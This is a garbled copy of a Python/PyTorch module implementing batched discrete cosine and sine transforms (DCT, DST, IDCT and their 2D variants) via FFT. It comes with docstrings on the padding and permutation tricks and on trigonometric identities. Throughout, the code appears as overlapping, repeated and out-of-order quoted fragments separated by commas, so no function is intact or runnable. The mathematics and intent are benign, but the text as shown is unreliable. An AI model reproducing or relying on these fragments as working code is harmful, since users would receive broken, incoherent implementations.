introduce", "FFT twice. \"\"\" def get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)),", "the same. The actual return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will", "Compute 1D DST twice. @param x batch tensor, the 2D", "expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous() def get_perm(N, dtype,", "sin(b) = 1/2 * (sin(a-b) - sin(a+b)) A 2D FFT", "by computing FFT twice. \"\"\" def get_expk(N, dtype, device): \"\"\"", "0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None): '''", "2*exp(-1j*pi*u/(2N)), but not exactly the same. The actual return is", "without normalization to coefficients. Compute idct(idxst(x)). @param x batch tensor,", "with length M @param expk0 with length M @param perm1", "if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) #", "2*exp(1j*pi*u/(2N)) 2. Pad x by zeros 3. Perform IFFT 4.", "def idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine Transformation", "dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idcst2(x, expk_0=None, expk_1=None):", "torch.nn.functional as F import pdb \"\"\" Discrete spectral transformation leveraging", "# import os import sys import numpy as np import", "@date Jun 2018 # import os import sys import numpy", "in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2.", "idct_2N(x, expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation without normalization", "if len(x.size()) == 1: y.squeeze_(0) return y def idxt(x, cos_or_sin_flag,", "MxN @param expk_0 with length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with", "x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z = torch.empty_like(x)", "0, expk_1) def idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse", "None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N))", "that [a, b, c, d, e, f] becomes [a, c,", "Sine-Cosine Transformation without normalization to coefficients. It computes following equation,", "def idcst2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse Discrete Cosine-Sine", "Discrete Sine-Cosine Transformation without normalization to coefficients. It computes following", "@param perm1 with length N @param expk1 with length N", "+ v*j/N))). By mapping the original image from (i, j)", "with length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1),", "+ sin(a-b)) cos(a) sin(b) = 1/2 * (sin(a-b) - sin(a+b))", "Discrete Cosine-Sine Transformation without normalization to coefficients. Compute idct(idxst(x)). @param", "<= 1: x_reorder = x.view([1, N]) else: x_reorder = x.clone()", "dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch", "expk=expk1) def idct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete Cosine", "perm = torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2,", "y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the 2N padding trick", "# pad second last dimension, excluding the complex number dimension", "with length N @param expk1 with length N \"\"\" return", "properties. The trigonometric identities exploited by prosthaphaeresis relate products of", "Compute idct(idxst(x)). @param x batch tensor, the 2D part is", "= x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding the complex", "such that [a, b, c, d, e, f] becomes [a,", "= torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :] if expkp1 is", "signal_sizes=[2*N])[..., 1:N+1] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y", "= torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype,", "expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # get imag part y", "y.squeeze_(0) return y def idxt(x, cos_or_sin_flag, expk=None): \"\"\" Batch Inverse", "2D part is MxN @param perm0 with length M @param", "cos(a+b)) sin(a) cos(b) = 1/2 * (sin(a+b) + sin(a-b)) cos(a)", "generate following array 0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3,", "Compute y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding", "2*exp(-1j*pi*u/(2N)) 4. Extract the real part \"\"\" # last dimension", "pik_by_2N.mul_(np.pi/(2*N)) # cos, sin # I use sin because the", "the 2D part is MxN @param perm0 with length M", "''' Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to", "numbers introduce a new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False,", "multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z", "device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device) return perm", "Sine Transformation without normalization to coefficients. Compute y_u = \\sum_i", "\"\"\" # last dimension N = x.size(-1) if perm is", "(0, 0, 0, N), 'constant', 0) if len(x.size()) == 1:", "column-major for speedup x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :]", "None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device) # get imag part", "N-j), we can have (u*i/M - v*j/N) inside exp. This", "M @param perm1 with length N @param expk1 with length", "return y def idct_N(x, expk=None): N = x.size(-1) if expk", "j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M +", "x.size(-1) if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)", "v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D", "2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) def", "idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2,", "torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N) z = torch.empty_like(x) z[..., 0:N:2] =", "dimension N = x.size(-1) # pad last dimension x_pad =", "part \"\"\" # last dimension N = x.size(-1) if expkp1", "get_expkp1(N, dtype=x.dtype, device=x.device) # get imag part y = y[...,", "discrete_spectral_transform.py # @author <NAME> # @date Jun 2018 # import", "import os import sys import numpy as np import torch", "expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) # multiply", "# last dimension N = x.size(-1) # pad last dimension", "to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the", "get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension() <= 1: x_reorder = x.view([1,", "None: expk = get_expk(N, dtype=x.dtype, device=x.device) # multiply by 2*exp(1j*pi*u/(2N))", "array 0, 2, 4, ..., 2*(N//2)-2, 2*(N//2)-1, 2*(N//2)-3, ..., 3,", "device): \"\"\" Compute 2*exp(-1j*pi*(u+1)/(2N)), but not exactly the same. The", "1: y.squeeze_(0) return y def idct_N(x, expk=None): N = x.size(-1)", "expk_1) def idxst_idct(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse Discrete", "to coefficients. Compute y_u = \\sum_i x_i sin(pi*(2i+1)*(u+1)/(2N)), Impelements the", "M @param expk0 with length M @param perm1 with length", "normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0)", "def idst(x, expkp1=None): \"\"\" Batch Inverse Discrete Sine Transformation without", "much faster than sum #y = y.sum(dim=-1) return y[..., 0]+y[...,", "2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x,", "+ cos(a+b)) sin(a) cos(b) = 1/2 * (sin(a+b) + sin(a-b))", "dim1=-1), expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch", "is MxN @param perm0 with length M @param expk0 with", "+ v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). By mapping the", "# I found add is much faster than sum #y", "@param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 0,", "# last dimension N = x.size(-1) if expk is None:", "Cosine-Sine Transformation without normalization to coefficients. Compute idct(idxst(x)). @param x", "pad last dimension x_pad = F.pad(x, (0, N), 'constant', 0)", "expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1,", "x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is to match idct_2N #", "expk1 with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1),", "new dimension # Must use IFFT here y = torch.ifft(x_pad,", "j * sin(pi*u/(2N)) pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) #", "0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[...,", "= get_expk(N, dtype=x.dtype, device=x.device) size = list(x.size()) size.append(2) x_reorder =", "= torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N) if expk", "Cosine-Sine Transformation without normalization to coefficients. It computes following equation,", "sin # I use sin because the real part requires", "pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype, device): \"\"\"", "FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by", "which is slightly different from standard DCT formulation. y_{u, v}", "image from (i, j) to (i, N-j), we can have", "x.unsqueeze(-1).mul(expkp1) # pad second last dimension, excluding the complex number", "N]) else: x_reorder = x.clone() # switch from row-major to", "0:N, :] y.mul_(1.0/N) if expk is None: expk = get_expk(N,", "torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk = torch.stack([pik_by_2N.cos(),", "various cos/sin transformation by computing FFT twice. \"\"\" def get_expk(N,", "z[..., 1:N:2] = y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x,", "the real part \"\"\" # last dimension N = x.size(-1)", "y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick", "trick to solve DCT with FFT in the following link,", ":] if expkp1 is None: expkp1 = get_expkp1(N, dtype=x.dtype, device=x.device)", "\"\"\" perm = torch.zeros(N, dtype=dtype, device=device) perm[0:(N-1)//2+1] = torch.arange(0, N,", "x_pad = x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding the", "then 1D DST. @param x batch tensor, the 2D part", "Perform IFFT 4. Extract the real part @param x batch", "# cos, sin # I use sin because the real", "Jun 2018 # import os import sys import numpy as", "perm = get_perm(N, dtype=torch.int64, device=x.device) if x.ndimension() <= 1: x_reorder", "pdb \"\"\" Discrete spectral transformation leveraging fast fourier transform engine.", "with FFT in the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x", "N), 'constant', 0) if len(x.size()) == 1: x_pad.unsqueeze_(0) # the", "Inverse Discrete Cosine-Sine Transformation without normalization to coefficients. Compute idct(idxst(x)).", "permuting trick to solve DCT with FFT in the following", ":] x_reorder = x_reorder.index_select(dim=-2, index=perm) # switch back x_reorder.transpose_(dim0=-2, dim1=-1)", "to solve IDCT with IFFT in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py", "x batch tensor, the 2D part is MxN @param perm0", "get_expk(N, dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the", "= \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT", "= \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j", "multiplication easier. \"\"\" pik_by_2N = torch.arange(N, dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) #", "expk1) def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None): \"\"\" Batch 2D", "dtype=dtype, device=device) pik_by_2N.mul_(np.pi/(2*N)) # cos, -sin expk = torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()],", "part y.mul_(expk) # I found add is much faster than", "1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) # this is to match", ":N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[..., 0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[...,", "= x.view([1, N]) else: x_reorder = x.clone() # switch from", "device=device) perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] =", "torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I", "\"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same. The actual", "us to derive various cos/sin transformation by computing FFT twice.", "cos(pi/N*q*(v+0.5)) Compute 1D DST and then 1D DCT. @param x", "torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2,", "x batch tensor, the 2D part is MxN @param expkp1_0", "coefficients. Compute 1D DCT twice. @param x batch tensor, the", "dim1=-1), 0, expk_1) def idsct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D", "y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)), Impelements the 2N padding trick", "x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M", "return expk.contiguous() def get_exact_expk(N, dtype, device): # Compute exp(-j*pi*u/(2N)) =", "cos(pi*(2i+1)*u/(2N)), Impelements the 2N padding trick to solve DCT with", "dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2, index=perm)", "idct(idxst(x)). @param x batch tensor, the 2D part is MxN", "following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x such that [a, b,", "import sys import numpy as np import torch import torch.nn.functional", "len(x.size()) == 1: x_pad.unsqueeze_(0) # the last dimension here becomes", "exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) =", "0]+y[..., 1] def dct_N(x, perm=None, expk=None): \"\"\" Batch Discrete Cosine", "multiplication expk = torch.stack([neg_pik_by_2N.cos(), neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def", "x_reorder.transpose_(dim0=-2, dim1=-1) y = torch.rfft(x_reorder, signal_ndim=1, normalized=False, onesided=False)[..., 0:N, :]", "import numpy as np import torch import torch.nn.functional as F", "\\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5)) Compute 1D DCT and then", "dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)", "expk_0).transpose(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0,", "z = torch.empty_like(x) z[..., 0:N:2] = y[..., :(N+1)//2, 0] z[...,", "Discrete Sine Transformation without normalization to coefficients. Compute 1D DST", "-2 because complex numbers introduce a new dimension y =", "\\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i, j}", "N = x.size(-1) # pad last dimension x_pad = F.pad(x,", "q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D DCT twice. @param x batch", "return y[..., 0]+y[..., 1] def idct_2N(x, expk=None): \"\"\" Batch Inverse", "1D tensor for conversion @param cos_or_sin_flag 0 for cosine tranformation", "0 for cosine tranformation and 1 or sine transformation @param", "swap -cos and sin because we need the imag part", "= F.pad(x_pad, (0, 0, 0, N), 'constant', 0) if len(x.size())", "Inverse Discrete Sine-Cosine Transformation without normalization to coefficients. It computes", "dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2,", "y[..., 0].mul(expkp1[:, 1]) return y def idst(x, expkp1=None): \"\"\" Batch", "j} (cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). By", "2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1, 0, -2, dtype=dtype, device=device)", "= torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos #", "to coefficients. Compute 1D DST twice. @param x batch tensor,", "neg_pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_exact_expk(N, dtype, device): #", "return is 2*cos(pi*u/(2N)), 2*sin(pi*u/(2N)). This will make later multiplication easier.", "signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N) if expk is None:", "# get imag part y = y[..., 1].mul(expkp1[:, 0]) -", "idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\"", "original image from (i, j) to (i, N-j), we can", "dim1=-1), expk1) def dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete", "length N, 2*exp(-1j*pi*k/(2N)) \"\"\" return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0,", "def get_perm(N, dtype, device): \"\"\" Compute permutation to generate following", "= 1/2 * (cos(a-b) + cos(a+b)) sin(a) cos(b) = 1/2", "0]).sub_(x_reorder[..., 1].mul(expk[..., 1])) x_reorder[..., 1].mul_(expk[..., 0]) x_reorder[..., 1].add_(x.mul(expk[..., 1])) #", "dct_N(x, perm=None, expk=None): \"\"\" Batch Discrete Cosine Transformation without normalization", "dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 0:N] y.mul_(N)", "Extract the real part \"\"\" # last dimension N =", "return y def dct2_2N(x, expk0=None, expk1=None): \"\"\" Batch 2D Discrete", "faster than sum #y = y.sum(dim=-1) return y[..., 0]+y[..., 1]", "FFT performs y_{u, v} = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M)", "dtype=dtype, device=device) return perm def dct_2N(x, expk=None): \"\"\" Batch Discrete", "idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2,", "of trigonometric functions to sums. sin(a) sin(b) = 1/2 *", "a new dimension # Must use IFFT here y =", "dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1) # return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2,", "dimension N = x.size(-1) if perm is None: perm =", "dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\"", "Compute exp(-j*pi*u/(2N)) = cos(pi*u/(2N)) - j * sin(pi*u/(2N)) pik_by_2N =", "cos/sin transformation by computing FFT twice. \"\"\" def get_expk(N, dtype,", "slightly different from standard DCT formulation. y_{u, v} = \\sum_p", "@param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2,", "Pad x by zeros 3. Perform IFFT 4. Extract the", "torch import torch.nn.functional as F import pdb \"\"\" Discrete spectral", "return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None):", "y[..., (N+1)//2:, 0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None): \"\"\" Batch", "the following link, https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. Pad x by zeros 2.", "coefficients. Compute idxst(idct(x)) @param x batch tensor, the 2D part", "is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device)", "* (cos(a-b) - cos(a+b)) cos(a) cos(b) = 1/2 * (cos(a-b)", "actual return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1,", "dst2(x, expkp1_0=None, expkp1_1=None): \"\"\" Batch 2D Discrete Sine Transformation without", "IFFT 4. Extract the real part @param x batch 1D", "2*exp(-1j*pi*k/(2M)) @param expk_1 with length N, 2*exp(-1j*pi*k/(2N)) ''' return idct_N(idxt(x,", "transformation by computing FFT twice. \"\"\" def get_expk(N, dtype, device):", "we need the imag part # this will be easier", "sum #y = y.sum(dim=-1) return y[..., 0]+y[..., 1] def dct_N(x,", "y def idst(x, expkp1=None): \"\"\" Batch Inverse Discrete Sine Transformation", "x_reorder[..., 1:, 1] = x.flip([x.ndimension()-1])[..., :N-1].mul_(-1) x_reorder[..., 0] = x.mul(expk[...,", "torch.stack([pik_by_2N.cos(), -pik_by_2N.sin()], dim=-1) return expk.contiguous() def get_perm(N, dtype, device): \"\"\"", "dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype, device): \"\"\" Compute", "= list(x.size()) size.append(2) x_reorder = torch.zeros(size, dtype=x.dtype, device=x.device) x_reorder[..., 0]", "part \"\"\" # last dimension N = x.size(-1) if expk", "subtraction # this will be easier for multiplication expk =", "2*exp(1j*pi*u/(2N)) x_pad = x.unsqueeze(-1).mul(expkp1) # pad second last dimension, excluding", "IFFT 4. Extract the real part \"\"\" # last dimension", "perm[0:(N-1)//2+1] = torch.arange(0, N, 2, dtype=dtype, device=device) perm[(N-1)//2+1:] = torch.arange(2*(N//2)-1,", "return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def idsct2(x,", "expk is None: expk = get_expk(N, dtype=x.dtype, device=x.device) # get", "expk_0 with length M, 2*exp(-1j*pi*k/(2M)) @param expk_1 with length N,", "dimension N = x.size(-1) if expkp1 is None: expkp1 =", "x_i cos(pi*(2i+1)*u/(2N)), Impelements the N permuting trick to solve DCT", "expk1 with length N \"\"\" return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1),", "@param perm0 with length M @param expk0 with length M", "1D DCT. @param x batch tensor, the 2D part is", "exp. This will enable us to derive various cos/sin transformation", "length M @param expk1 with length N \"\"\" return dct_2N(dct_2N(x.transpose(dim0=-2,", "y.sum(dim=-1) return y[..., 0]+y[..., 1] def dct_N(x, perm=None, expk=None): \"\"\"", "formulation. y_{u, v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5))", "import torch.nn.functional as F import pdb \"\"\" Discrete spectral transformation", "Compute permutation to generate following array 0, 2, 4, ...,", "0].flip([x.ndimension()-1]) return z def dst(x, expkp1=None): \"\"\" Batch Discrete Sine", "v} = \\sum_p \\sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5)) Compute 1D", "1:N+1] y.mul_(N) if len(x.size()) == 1: y.squeeze_(0) return y def", "onesided=True)[..., 1:N+1, :] if expkp1 is None: expkp1 = get_expkp1(N,", "batch tensor, the 2D part is MxN @param perm0 with", "0) # the last dimension here becomes -2 because complex", "x_reorder.transpose_(dim0=-2, dim1=-1) #x_reorder = x_reorder[..., perm, :] x_reorder = x_reorder.index_select(dim=-2,", "cos, sin # I use sin because the real part", "IDCT with IFFT in the following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply", "performs y_{u, v} = \\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N)", "Batch 2D Discrete Cosine Transformation without normalization to coefficients. Compute", "x.unsqueeze(-1).mul(expk) # pad second last dimension, excluding the complex number", "expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1) def idxst_idct(x, expk_0=None, expk_1=None): ''' Batch", "2*sin(pi*u/(2N)). This will make later multiplication easier. \"\"\" pik_by_2N =", "MxN @param expkp1_0 with length M @param expkp1_1 with length", "length N, 2*exp(-1j*pi*k/(2N)) ''' return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2,", "idxst(idct(x)) @param x batch tensor, the 2D part is MxN", "= x.size(-1) # pad last dimension x_pad = F.pad(x, (0,", "(cos(-2*pi*(u*i/M + v*j/N)) + j sin(-2*pi*(u*i/M + v*j/N))). By mapping", "expk_1=None): ''' Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization", "tranformation and 1 or sine transformation @param expk 2*exp(j*pi*k/(2N)) \"\"\"", "following link, https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad x", "# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1) def", "neg_pik_by_2N.mul_(np.pi/(2*N)) # sin, -cos # I swap -cos and sin", "idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1) def idct2_N(x, expk0=None, expk1=None): \"\"\"", "expk_0).transpose_(dim0=-2, dim1=-1) def idct_idxst(x, expk_0=None, expk_1=None): ''' Batch 2D Inverse", "last dimension x_pad = F.pad(x, (0, N), 'constant', 0) #", "dtype, device): \"\"\" Compute 2*exp(-1j*pi*u/(2N)), but not exactly the same.", "Compute y_u = \\sum_i x_i cos(pi*(2i+1)*u/(2N)), Impelements the N permuting", "dim1=-1), expkp1_1) def idcct2(x, expk_0=None, expk_1=None): \"\"\" Batch 2D Inverse", "new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :]", "normalized=False, onesided=True)[..., 1:N+1, :] if expkp1 is None: expkp1 =", "(cos(a-b) - cos(a+b)) cos(a) cos(b) = 1/2 * (cos(a-b) +", "by 2*exp(-1j*pi*u/(2N)) 4. Extract the real part \"\"\" # last", "part requires subtraction # this will be easier for multiplication", "2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype, device=device) neg_pik_by_2N.mul_(np.pi/(2*N))", "\\sum_i \\sum_j x_{i, j} exp(-j*2*pi*u*i/M) exp(-j*2*pi*v*j/N) = \\sum_i \\sum_j x_{i,", "to coefficients. It computes following equation, which is slightly different", "by 2*exp(1j*pi*u/(2N)) 2. Pad x by zeros 3. Perform IFFT", "\\sum_i \\sum_j x_{i, j} exp(-j*2*pi*(u*i/M + v*j/N)) = \\sum_i \\sum_j", "a new dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[...,", "return expk.contiguous() def get_perm(N, dtype, device): \"\"\" Compute permutation to", "new dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 1:N+1, :]", "is MxN @param expkp1_0 with length M @param expkp1_1 with", "Batch Inverse Discrete Sine Transformation without normalization to coefficients. Compute", "expk=None): \"\"\" Batch Inverse Discrete Cosine Transformation without normalization to", "\"\"\" Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to", "0, N), 'constant', 0) if len(x.size()) == 1: x_pad.unsqueeze_(0) #", "https://dsp.stackexchange.com/questions/2807/fast-cosine-transform-via-fft 1. permute x such that [a, b, c, d,", "return is 2*cos(pi*(u+1)/(2N)), 2*sin(pi*(u+1)/(2N)) \"\"\" neg_pik_by_2N = torch.arange(1, N+1, dtype=dtype,", "https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py 1. Multiply by 2*exp(1j*pi*u/(2N)) 2. Pad x by zeros", "* (cos(a-b) + cos(a+b)) sin(a) cos(b) = 1/2 * (sin(a+b)", "is to match idct_2N # normal way should multiply 0.25", "Discrete Cosine-Sine Transformation without normalization to coefficients. It computes following", "new dimension y = torch.irfft(x_pad, signal_ndim=1, normalized=False, onesided=False, signal_sizes=[2*N])[..., 1:N+1]", "1: x_reorder = x.view([1, N]) else: x_reorder = x.clone() #", "Extract the real part @param x batch 1D tensor for", "torch.stack([pik_by_2N.cos(), pik_by_2N.sin()], dim=-1) expk.mul_(2) return expk.contiguous() def get_expkp1(N, dtype, device):", "expk0 with length M @param perm1 with length N @param", "here y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag] y.mul_(N) if", "should multiply 0.25 x_reorder.mul_(0.5) y = torch.ifft(x_reorder, signal_ndim=1, normalized=False) y.mul_(N)", "dimension y = torch.rfft(x_pad, signal_ndim=1, normalized=False, onesided=True)[..., 0:N, :] y.mul_(1.0/N)", "without normalization to coefficients. Compute y_u = \\sum_i x_i cos(pi*(2u+1)*i/(2N)),", "= get_expk(N, 